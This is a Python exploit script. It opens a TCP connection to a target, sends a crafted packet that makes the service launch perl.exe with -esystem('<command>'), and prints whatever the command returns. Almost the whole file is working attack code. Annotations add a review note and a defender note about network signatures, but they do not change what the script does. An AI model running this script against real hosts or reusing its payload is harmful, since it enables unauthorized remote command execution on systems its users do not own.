import socket
import struct
import sys


def usage() -> None:
    """Print a usage line to stderr and exit with status -1.

    The printed synopsis names no arguments; the ``__main__`` block below
    requires three positionals (host, port, command).  ``exit`` here is the
    ``site``-provided helper, which raises ``SystemExit``.
    """
    print(f"Usage: {sys.argv[0]} ", file=sys.stderr)
    exit(-1)


def exploit(host: str, port, command: str) -> None:
    """Send one hand-built request to ``host``:``port`` and print the reply.

    The request packet is: three NUL bytes, a single length byte
    (``OFFSET`` + the length of the backslash-escaped command), a run of
    fixed header bytes, the literal ``\\perl.exe`` and an
    ``-esystem('...')`` argument wrapping ``command``.  After sending, each
    reply record is read as a 4-byte big-endian length followed by that
    many bytes, trimmed, printed to stdout, and the loop stops at the first
    record containing ``*RETVAL*`` (any case) or when the peer closes.

    Args:
        host: target hostname or IP address.
        port: target TCP port; passed through ``int`` again here, so a
            digit string is accepted as well as an int.
        command: command text embedded verbatim (after escaping) inside
            the ``system('...')`` call.

    Raises:
        UnicodeEncodeError: if ``command`` is not Latin-1 encodable, or if
            ``OFFSET`` plus its escaped length exceeds 255 (the length
            field is a single Latin-1 byte).

    Exits with status -3 when the connection attempt fails.

    Defender note: the fixed header bytes and the constant
    ``\\perl.exe`` / ``-esystem('`` fragments do not vary between runs,
    which makes them the natural material for a network signature; a
    length-prefixed ``*RETVAL*`` reply is the matching server-side marker.
    """
    print(f"[*] Connecting to target '{host}:{port}'...", file=sys.stderr)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, int(port)))
    except Exception as ex:
        # Broad catch: any connect-time error (refused, DNS, timeout, bad
        # port) is fatal.  The socket is not closed before exiting.
        print(f"[!] Socket error: \n\t{ex}", file=sys.stderr)
        exit(-3)
    else:
        print("[*] Connected to the target.", file=sys.stderr)
    # Base value added to the escaped command length to form the single
    # length byte of the packet; presumably the size of the fixed part of
    # the payload that follows it — not derivable from this file.
    OFFSET = 46
    # Double every backslash so the command survives inside the single-
    # quoted Perl string literal built below.
    command = command.replace("\\", "\\\\")
    # One byte only: chr() values above 255 fail to encode as Latin-1.
    command_size = chr(OFFSET + len(command)).encode('latin-1')
    # NOTE: b"\x2028\x00" is the escape \x20 followed by the ASCII text
    # "28" and a NUL, i.e. b" 28\x00" — not a two-byte \x2028 escape.
    CRAFTED_PKT = b"\x00\x00\x00" + \
        command_size + \
        b"\x32\x00\x01" + \
        b"\x01\x01\x01" + \
        b"\x01\x01\x00" + \
        b"\x01\x00\x01" + \
        b"\x00\x01\x00" + \
        b"\x01\x01\x00" + \
        b"\x2028\x00" + \
        b"\\perl.exe" + \
        b"\x00 -esystem('" + command.encode('latin-1') + b"')\x00"
    print(f"[*] Sending payload '{command}'", file=sys.stderr)
    sock.sendall(CRAFTED_PKT)
    print("[*] Output:", file=sys.stderr)
    while True:
        # Each reply record starts with a 4-byte big-endian length prefix.
        response_size = sock.recv(4)
        if not response_size:
            # Empty read: the peer closed the connection.
            break
        n = struct.unpack(">I", response_size)[0]
        # NOTE(review): a single recv(n) may return fewer than n bytes;
        # the loop does not re-read to fill the record, nor does it check
        # that the 4-byte prefix itself arrived complete (struct.error).
        response = sock.recv(n)
        # Drop the first five bytes of the record (presumably a record
        # header — not derivable here), then whitespace, newlines and NULs.
        response = response[5:].strip()
        response = response.replace(b"\n", b"")
        response = response.replace(b"\x00", b"")
        # Upper-casing the record makes the marker check case-insensitive.
        if b"*RETVAL*" in response.upper():
            break
        print(response.decode('latin-1'))
    # Only reached on normal loop exit; exceptions above leak the socket.
    sock.close()


if __name__ == "__main__":
    argc = len(sys.argv)
    # Three positionals required: host, port, command.
    if argc < 4:
        usage()
    host = sys.argv[1]
    port = sys.argv[2]
    cmd = sys.argv[3]
    # isdigit() rejects negatives and signs; it does accept non-ASCII
    # decimal digits, which int() also parses.
    if port.isdigit():
        port = int(port)
    else:
        print("[!] Error, invalid port value", file=sys.stderr)
        exit(-2)
    exploit(host, port, cmd)
    exit(0)